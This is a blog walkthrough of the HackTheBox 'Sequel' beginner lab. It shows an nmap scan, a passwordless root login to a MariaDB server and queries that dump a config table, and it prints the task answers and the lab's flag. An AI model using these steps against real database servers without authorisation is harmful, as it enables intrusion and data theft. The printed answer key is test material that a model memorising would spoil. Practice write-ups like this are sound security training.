Sequel Starting Point HackTheBox Challenge Tier 1 WriteUp

protonsec
4 min readJul 30, 2022

--

Sequel Starting Point HackTheBox Challenge Tier 1 WriteUp
Sequel Starting Point HackTheBox Challenge Tier 1 WriteUp

Sequel is a really nice challenge by HacktheBox to Practice Hacking skills. So in this writeup we are going to dive into it.

Sequel Starting Point HackTheBox Challenge Tier 1 WriteUp
Sequel Starting Point HackTheBox Challenge Tier 1 WriteUp

Fire up your terminal and scan for the target like

wesecure1337@kali:~$ nmap 10.129.95.232
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 16:06 IST
Nmap scan report for 10.129.95.232
Host is up (0.44s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 54.74 seconds

From the scan results our useful information is

Host is up (0.44s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
3306/tcp open mysql

If you have read our previous writeup of Appointment Starting Point challenge the you know the solution for Task 1, else simple google sql stands for and you will get the answer.

TASK 1What does the acronym SQL stand for?
Structured Query Language

As shown in the scan results only one port 3306 is open which is running mysql

TASK 2During our scan, which port running mysql do we find?
3306

MariaDB is a community-developed popular MySQL version

TASK 3What community-developed MySQL version is the target running?
MariaDB

If you have mysql installed in your system simple type mysql --help as shown

wesecure@kali:~$ mysql --help

Your will get the entire help menu of which says

wesecure@kali:~$ mysql --help
...
-u, --user=name User for login if not current user.
...

So from here we know that the flag -u is used to specify username.

TASK 4What switch do we need to use in order to specify a login username for the MySQL service?
-u

Using root as username, one can login without providing any password in MariaDB.

TASK 5Which username allows us to log into MariaDB without providing a password?
root

If you every used sql then you know that * is used to represent all

TASK 6What symbol can we use to specify within the query that we want to display everything inside a table?
*

; is a very common symbol used in many languages like c, cpp, java etc to end line similar is case with queries.

TASK 7What symbol do we need to end each query with?
;

Now we are going to exploit the mysql

Let’s connect to the database

wesecure1337@kali:~$ mysql -u root -p -h 10.129.95.232
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 73
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.MariaDB [(none)]>

Here -u specify root as username -p for password which is blank in this case -h for hostname which is the ip_address of sequel challenge. When prompted for Enter password: just hit Enter you will be logged in. Follow the steps to get the flag.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.284 sec)
MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.221 sec)
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.263 sec)
MariaDB [htb]>

show databases;is used to list the available databases

use htb;is used to see set the database to htb

show tables; is used to see tables inside htb database.

select * from config; is used to see all available data in config table.

So finally we found our flag.

SUBMIT FLAGSubmit root flag
7b4bec00d1a39e3dd4e021ec3d915da8

Voila!!! We have successfully solved Sequel Starting Point Challenge by HacktheBox. If you really enjoyed this writeup/walkthrough, then do checkout our other wirteups about related topics.

Let’s get connected

Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec

If you want to appreciate and support my work here you go…

Thanks for Reading!!!

--

--